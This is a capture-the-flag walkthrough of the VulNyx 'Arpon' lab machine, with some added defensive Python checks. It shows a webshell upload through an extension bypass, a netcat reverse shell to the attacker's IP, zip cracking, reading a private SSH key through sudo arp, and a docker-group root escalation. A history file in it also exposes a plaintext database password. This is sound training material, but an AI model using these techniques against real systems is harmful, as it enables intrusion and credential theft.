VulNyx - Arpon

  • File Upload - (Bypass Extension Check)
  • Brute Force Zip File - (JohnTheRipper/User Pivoting)
  • Abusing arp Binary - (id_rsa/User Pivoting 2)
  • Docker Group - (Privesc)

Port scan

❯ nmap -p- -sS --min-rate 5000 -vvv -n -Pn 172.0.100.28

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64

Service scan

❯ nmap -sVC -p 22,80 172.0.100.28

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 e1:85:8b:7b:6d:a2:6b:1a:ed:18:8e:08:a0:90:87:2a (ECDSA)
|_  256 ad:fe:77:78:a0:57:70:cc:33:68:b5:84:26:a3:b3:63 (ED25519)
80/tcp open  http    Apache httpd 2.4.59 ((Debian))
|_http-title: Essex
|_http-server-header: Apache/2.4.59 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP TCP - 80

I brute-force directories.

❯ gobuster dir -u 172.0.100.28 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.0.100.28
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/backup               (Status: 301) [Size: 313] [--> http://172.0.100.28/backup/]
/imagenes             (Status: 301) [Size: 315] [--> http://172.0.100.28/imagenes/]

The /backup directory contains a file upload tool.

I upload a PNG image and it uploads successfully.

I brute-force directories again to find the directory where uploaded images are stored.

❯ gobuster dir -u 172.0.100.28/backup -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.0.100.28/backup
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/empty                (Status: 301) [Size: 319] [--> http://172.0.100.28/backup/empty/]
Progress: 175328 / 175330 (100.00%)

Now I brute-force the .png extension in the /empty directory.

❯ gobuster dir -u 172.0.100.28/backup/empty -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -x png
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.0.100.28/backup/empty
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              png
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/debian.png           (Status: 200) [Size: 25182]

If I try to upload a .php file it returns an error, so I open Burp Suite, intercept the request, change the filename from debian.png to door.phar, delete the image content and insert malicious PHP code in its place.

In the response I see that it uploaded successfully: since this is an easy machine, it does not filter all extensions correctly.

This link has the basic file upload methodology; it can be done manually or automatically with Burp Suite's Intruder, and this link shows how it is done. I did it manually because I have already done similar machines.

With curl I confirm that I can execute commands remotely.

❯ curl -s "172.0.100.28/backup/empty/door.phar?cmd=id"
PNG

uid=33(www-data) gid=33(www-data) groups=33(www-data)
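The "PNG" at the start of that output shows the stored file still began with an image signature, so neither a .php blocklist nor a content check alone would have refused it. The sketch below is an added example, not code from the target application or from the original write-up: the blocklist behaviour is an assumption inferred from the error on .php, and the sample body is constructed with a harmless placeholder.

```python
import os
import secrets

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JPEG_MAGIC = b"\xff\xd8\xff"
ALLOWED = {".png": PNG_MAGIC, ".jpg": JPEG_MAGIC, ".jpeg": JPEG_MAGIC}

# Constructed upload: same file name as on the page, PNG signature kept, and a
# harmless placeholder where the intercepted request carried PHP code.
SAMPLE_NAME = "door.phar"
SAMPLE_BODY = PNG_MAGIC + b"<?php /* placeholder */ ?>"


def blocklist_check(filename):
    """Assumed weak filter: refuses only names ending in .php."""
    return not filename.lower().endswith(".php")


def magic_only_check(body):
    """Content sniffing alone: accepts anything that starts like a PNG."""
    return body.startswith(PNG_MAGIC)


def hardened_store_name(filename, body):
    """Return a server-chosen name for an accepted upload, or None to refuse it."""
    base = os.path.basename(filename.replace("\\", "/"))
    if not base or any(ord(ch) < 32 for ch in base):
        return None
    # Allowlist on the final extension, and the content must match that type.
    ext = os.path.splitext(base)[1].lower()
    magic = ALLOWED.get(ext)
    if magic is None or not body.startswith(magic):
        return None
    # Discard the client-supplied name: a random name with one allowlisted
    # extension leaves no .phar/.php part for the web server to act on.
    # Bytes after the signature are not inspected, so this is only safe
    # because the stored extension is one the server does not execute.
    return secrets.token_hex(16) + ext


def review(filename, body):
    """Run all three checks on one upload and report which would accept it."""
    return {
        "blocklist": blocklist_check(filename),
        "magic_only": magic_only_check(body),
        "hardened": hardened_store_name(filename, body) is not None,
    }


if __name__ == "__main__":
    print(review(SAMPLE_NAME, SAMPLE_BODY))
```

Serving the upload directory with script execution disabled closes the remaining gap for files that pass the allowlist.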

I leave netcat listening and send myself a shell.

❯ curl -s "172.0.100.28/backup/empty/door.phar?cmd=nc%20-c%20/bin/bash%20172.0.100.25%201234"

I get the shell as the www-data user.

❯ nc -lvnp 1234
listening on [any] 1234 ...
connect to [172.0.100.25] from (UNKNOWN) [172.0.100.28] 33026
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

After upgrading the TTY, I run ls -la and see a hidden directory named .hidden.

www-data@arpon:/var/www/html/backup/empty$ ls -la

total 48
drwxr-xr-x 3 www-data www-data  4096 Jun  4 12:33 .
drwxr-xr-x 3 www-data www-data  4096 May 12 22:58 ..
drwxr-xr-x 2 www-data www-data  4096 May 13 23:31 .hidden
-rw-r--r-- 1 www-data www-data 25182 Jun  4 11:53 debian.png
-rw-r--r-- 1 www-data www-data    41 Jun  4 12:08 door.phar
-rw-r--r-- 1 www-data www-data     1 May 12 23:12 index.html

The hidden directory contains a zip file.

www-data@arpon:/var/www/html/backup/empty/.hidden$ ls -la
ls -la
total 12
drwxr-xr-x 2 www-data www-data 4096 May 13 23:31 .
drwxr-xr-x 3 www-data www-data 4096 Jun  4 12:33 ..
-rw-r--r-- 1 www-data www-data 3090 May 12 23:09 backup_id.zip

If I try to unzip it on the victim machine it asks for a password I don't have, but it seems to reveal a possible user named calabrote.

www-data@arpon:/var/www/html/backup/empty/.hidden$ unzip backup_id.zip

Archive:  backup_id.zip
[backup_id.zip] id_rsa_calabrote password:

I start a simple HTTP server with Python to download the zip file.

www-data@arpon:/var/www/html/backup/empty/.hidden$ python3 -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

I download it with wget.

❯ wget 172.0.100.28:8000/backup_id.zip
--2024-06-04 12:48:31--  http://172.0.100.28:8000/backup_id.zip
Connecting to 172.0.100.28:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3090 (3.0K) [application/zip]
Saving to: ‘backup_id.zip’

backup_id.zip             100%[===================================>]   3.02K  --.-KB/s    in 0s      

2024-06-04 12:48:31 (626 MB/s) - ‘backup_id.zip’ saved [3090/3090]

I create a hash of the zip with zip2john.

❯ zip2john backup_id.zip > hash

With john I brute-force the zip file and find its password.

❯ john hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
s*******h        (backup_id.zip) 

I unzip the file and get an RSA key that belongs to the user calabrote.

Archive:  backup_id.zip
[backup_id.zip] id_rsa_calabrote password:  
  inflating: id_rsa_calabrote        
  inflating: id_rsa_calabrote.pub 

I set permissions on the RSA key.

❯ chmod 600 id_rsa_calabrote

I connect to the system.

❯ ssh calabrote@172.0.100.28 -i id_rsa_calabrote
Linux arpon 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

$ bash -i
calabrote@arpon:~$

I run ls -la on /home to enumerate the system's users.

calabrote@arpon:~$ ls -la /home
total 16
drwxr-xr-x  4 root      root      4096 may 14 00:03 .
drwxr-xr-x 18 root      root      4096 may 11 22:49 ..
drwx------  3 calabrote calabrote 4096 jun  4 13:09 calabrote
drwx------  5 foque     foque     4096 may 13 21:55 foque

I enumerate sudo permissions.

calabrote@arpon:~$ sudo -l
Matching Defaults entries for calabrote on arpon:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User calabrote may run the following commands on arpon:
    (root) NOPASSWD: /usr/sbin/arp

I look up the arp binary on GTFOBins.

I read the .bash_history file.

calabrote@arpon:~$ LFILE=/home/foque/.bash_history
calabrote@arpon:~$ sudo /usr/sbin/arp -v -f "$LFILE"
>> ls -lhF
ls: No existe ninguna dirección asociada al nombre
arp: cannot set entry on line 1 of etherfile /home/foque/.bash_history !
>> cat script_net_backup.sh 
cat: No existe ninguna dirección asociada al nombre
arp: cannot set entry on line 2 of etherfile /home/foque/.bash_history !
>> chmod 755 script_net_backup.sh 
chmod: `Host' desconocido
arp: cannot set entry on line 3 of etherfile /home/foque/.bash_history !
>> exit
arp: format error on line 4 of etherfile /home/foque/.bash_history !
>> history 
arp: format error on line 5 of etherfile /home/foque/.bash_history !
>> docker run hello-world
docker: `Host' desconocido
arp: cannot set entry on line 6 of etherfile /home/foque/.bash_history !
>> docker container run -it --rm alpine
docker: `Host' desconocido
arp: cannot set entry on line 7 of etherfile /home/foque/.bash_history !
>> docker container ps
docker: `Host' desconocido
arp: cannot set entry on line 8 of etherfile /home/foque/.bash_history !
>> docker container ps -a
docker: `Host' desconocido
arp: cannot set entry on line 9 of etherfile /home/foque/.bash_history !
>> docker container --help
docker: `Host' desconocido
arp: cannot set entry on line 10 of etherfile /home/foque/.bash_history !
>> docker container prune
docker: `Host' desconocido
arp: cannot set entry on line 11 of etherfile /home/foque/.bash_history !
>> docker container ps -a
docker: `Host' desconocido
arp: cannot set entry on line 12 of etherfile /home/foque/.bash_history !
>> docker images 
docker: `Host' desconocido
arp: cannot set entry on line 13 of etherfile /home/foque/.bash_history !
>> history 
arp: format error on line 14 of etherfile /home/foque/.bash_history !
>> cat /etc/crontab 
cat: No existe ninguna dirección asociada al nombre
arp: cannot set entry on line 15 of etherfile /home/foque/.bash_history !
>> top
arp: format error on line 16 of etherfile /home/foque/.bash_history !
>> ip addr
ip: `Host' desconocido
arp: cannot set entry on line 17 of etherfile /home/foque/.bash_history !
>> mysql -uroot -pAbc123.. -h 10.1.1.1
mysql: `Host' desconocido
arp: cannot set entry on line 18 of etherfile /home/foque/.bash_history !
>> history 
arp: format error on line 19 of etherfile /home/foque/.bash_history !
>> ss -lntp
ss: No existe ninguna dirección asociada al nombre
arp: cannot set entry on line 20 of etherfile /home/foque/.bash_history !
>> ls -lhF /var/www/html/
ls: No existe ninguna dirección asociada al nombre
arp: cannot set entry on line 21 of etherfile /home/foque/.bash_history !

The .bash_history shows that the user foque runs cat on script_net_backup.sh, so I read that file to see what it is.

calabrote@arpon:~$ LFILE=/home/foque/script_net_backup.sh
calabrote@arpon:~$ sudo /usr/sbin/arp -v -f "$LFILE"
>> #!/bin/sh
>> cd /var/www/html
cd: No existe ninguna dirección asociada al nombre
arp: cannot set entry on line 2 of etherfile /home/foque/script_net_backup.sh !
>> tar czf /tmp/backup.tar.gz
tar: `Host' desconocido
arp: cannot set entry on line 3 of etherfile /home/foque/script_net_backup.sh !
>> scp -i /home/foque/.ssh/id_rsa_foque_script /tmp/backup.tar.gz 10.1.1.1@foque:backups/
scp: `Host' desconocido
arp: cannot set entry on line 4 of etherfile /home/foque/script_net_backup.sh !
>> rm /tmp/backup.tar.gz
rm: `Host' desconocido
arp: cannot set entry on line 5 of etherfile /home/foque/script_net_backup.sh !

In the script I can see that line 3 references the RSA key named id_rsa_foque_script; I set the LFILE variable again to read its contents.

calabrote@arpon:~$ LFILE=/home/foque/.ssh/id_rsa_foque_script
calabrote@arpon:~$ sudo /usr/sbin/arp -v -f "$LFILE"
>> -----BEGIN OPENSSH PRIVATE KEY-----
-----BEGIN: `Host' desconocido
arp: cannot set entry on line 1 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> -----END OPENSSH PRIVATE KEY-----
-----END: `Host' desconocido
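On the defensive side, every sudo arp -f call above is recorded by sudo with its full command line, so reads of files other than arp's default /etc/ethers can be flagged from the auth log. The following is an added example, not part of the original write-up: the log lines and their timestamps are constructed from the commands shown on this page, and the option table follows net-tools arp(8) and should be adjusted for other implementations.

```python
import posixpath
import re
import shlex

# sudo's syslog line: "... sudo: <user> : TTY=.. ; PWD=.. ; USER=<runas> ; COMMAND=<cmd>"
SUDO_RE = re.compile(
    r"sudo(?:\[\d+\])?:\s+(?P<user>\S+) : .*?USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.+)$"
)
EXPECTED_FILES = {"/etc/ethers"}   # file arp reads when -f has no argument
VALUE_SHORT = "iHtAp"              # short options that take a value (arp(8))
VALUE_LONG = {"--device", "--hw-type", "--protocol"}

# Constructed log lines mirroring the commands run on this page.
SAMPLE_LOG = """\
Jun  4 13:10:02 arpon sudo: calabrote : TTY=pts/0 ; PWD=/home/calabrote ; USER=root ; COMMAND=/usr/sbin/arp -v -f /home/foque/.bash_history
Jun  4 13:11:40 arpon sudo: calabrote : TTY=pts/0 ; PWD=/home/calabrote ; USER=root ; COMMAND=/usr/sbin/arp -vf /home/foque/.ssh/id_rsa_foque_script
Jun  4 13:12:05 arpon sudo: calabrote : TTY=pts/0 ; PWD=/home/calabrote ; USER=root ; COMMAND=/usr/sbin/arp -n
Jun  4 13:12:30 arpon sudo: calabrote : TTY=pts/0 ; PWD=/home/calabrote ; USER=root ; COMMAND=/usr/sbin/arp -f
"""


def arp_file_argument(command):
    """Return the file this arp command line would read, or None if -f is absent."""
    try:
        argv = shlex.split(command)
    except ValueError:
        argv = command.split()
    if not argv or posixpath.basename(argv[0]) != "arp":
        return None
    uses_file, positional, i = False, [], 1
    while i < len(argv):
        arg = argv[i]
        if arg in VALUE_LONG:
            i += 1                            # skip the option's value
        elif arg == "--file":
            uses_file = True
        elif arg.startswith("-") and not arg.startswith("--") and len(arg) > 1:
            for pos, ch in enumerate(arg[1:], start=1):
                if ch == "f":
                    uses_file = True
                elif ch in VALUE_SHORT:
                    if pos == len(arg) - 1:
                        i += 1                # value is the next token
                    break                     # rest of the cluster is the value
        elif not arg.startswith("-"):
            positional.append(arg)
        i += 1
    if not uses_file:
        return None
    # With -f, the first non-option argument is the file; the default is /etc/ethers.
    return posixpath.normpath(positional[0]) if positional else "/etc/ethers"


def suspicious_arp_reads(log_text):
    """Return (user, run-as, path) for each sudo arp -f on an unexpected file."""
    hits = []
    for line in log_text.splitlines():
        match = SUDO_RE.search(line)
        if not match:
            continue
        path = arp_file_argument(match.group("cmd"))
        if path is not None and path not in EXPECTED_FILES:
            hits.append((match.group("user"), match.group("runas"), path))
    return hits


if __name__ == "__main__":
    for hit in suspicious_arp_reads(SAMPLE_LOG):
        print(hit)
```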

I create the file foque.txt with the output for id_rsa_foque_script and clean it up with grep and sed, keeping only the lines arp echoed with the >> prefix and writing the result to id_rsa_foque.

❯ grep '^>> ' foque.txt | sed 's/^>> //' > id_rsa_foque

Once I have the clean RSA key, I set its permissions with chmod and connect to the system as the user foque.

❯ chmod 600 id_rsa_foque
❯ ssh foque@172.0.100.28 -i id_rsa_foque
Linux arpon 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
$ bash -i 
foque@arpon:~$ 

With id I see that foque is a member of the docker group.

foque@arpon:~$ id
uid=1002(foque) gid=1002(foque) grupos=1002(foque),996(docker)

This link gives me information for escalating privileges.

Entering the one-liner returns a root terminal.

foque@arpon:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# bash -i
root@303a71a3f53f:/# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
root@303a71a3f53f:/#
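Because docker group membership is equivalent to root on the host, two checks are worth automating: which accounts can reach the Docker daemon, and which docker run command lines bind-mount sensitive host paths. The following is an added example, not part of the original write-up: the passwd and group excerpts are constructed (foque's uid and the docker gid come from the id output above, the other entries including the hypothetical builder account are assumptions), and the SENSITIVE list is an assumption to adapt.

```python
import posixpath
import shlex

# Constructed account data. "builder" is a hypothetical account whose primary
# group is docker, so it does not appear in the group file's member list.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
calabrote:x:1001:1001::/home/calabrote:/bin/sh
foque:x:1002:1002::/home/foque:/bin/sh
builder:x:1003:996::/home/builder:/bin/sh
"""
GROUP = """\
root:x:0:
docker:x:996:foque
foque:x:1002:
"""
SENSITIVE = ("/", "/etc", "/root", "/var/run/docker.sock")  # assumed watch list


def docker_capable_accounts(passwd_text, group_text, group="docker"):
    """Return sorted (user, how) pairs for every non-root account in `group`."""
    gid, found = None, {}
    for line in group_text.splitlines():
        name, _, g, members = (line.split(":") + [""] * 4)[:4]
        if name == group:
            gid = g
            for user in filter(None, members.split(",")):
                found[user] = "supplementary"
    for line in passwd_text.splitlines():
        fields = line.split(":")
        # Primary-group members are only visible in passwd, not in group.
        if len(fields) >= 4 and fields[3] == gid and fields[2] != "0":
            found[fields[0]] = "primary"
    found.pop("root", None)
    return sorted(found.items())


def host_bind_mounts(command):
    """Return the sensitive host paths a docker command line bind-mounts."""
    argv = shlex.split(command)
    hits = []
    for i, arg in enumerate(argv):
        spec = None
        if arg in ("-v", "--volume", "--mount") and i + 1 < len(argv):
            spec = argv[i + 1]
        elif arg.startswith(("--volume=", "--mount=")):
            spec = arg.split("=", 1)[1]
        if spec is None:
            continue
        if "=" in spec:      # --mount type=bind,source=/,target=/mnt
            pairs = dict(p.split("=", 1) for p in spec.split(",") if "=" in p)
            src = pairs.get("source") or pairs.get("src")
        else:                # -v /:/mnt[:ro]
            src = spec.split(":", 1)[0]
        if src and src.startswith("/") and posixpath.normpath(src) in SENSITIVE:
            hits.append(posixpath.normpath(src))
    return hits


if __name__ == "__main__":
    print(docker_capable_accounts(PASSWD, GROUP))
    print(host_bind_mounts("docker run -v /:/mnt --rm -it alpine chroot /mnt sh"))
```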

And that's the end of the Arpon machine.

Regards!